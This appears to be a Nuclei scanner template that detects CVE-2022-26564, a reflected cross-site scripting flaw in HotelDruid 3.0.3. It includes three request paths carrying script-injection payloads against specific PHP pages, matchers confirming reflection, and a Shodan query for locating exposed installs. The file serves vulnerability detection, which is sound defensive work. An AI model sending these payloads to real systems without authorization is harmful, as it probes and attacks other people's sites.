nuclei-templates/cves/2022/CVE-2022-26564.yaml

45 lines
1.4 KiB
YAML

id: CVE-2022-26564
info:
name: HotelDruid Hotel Management Software 3.0.3 XSS
author: alexrydzak
severity: medium
description: |
HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability.
reference:
- https://rydzak.me/2022/04/cve-2022-26564/
- https://nvd.nist.gov/vuln/detail/CVE-2022-26564
- https://www.hoteldruid.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-26564
cwe-id: CWE-79
metadata:
shodan-query: http.favicon.hash:-1521640213
tags: cve,cve2022,hoteldruid,xss
requests:
- method: GET
path:
- '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'
- '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'
- '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>javascript:alert('XSS')</script>"
- "HotelDruid"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200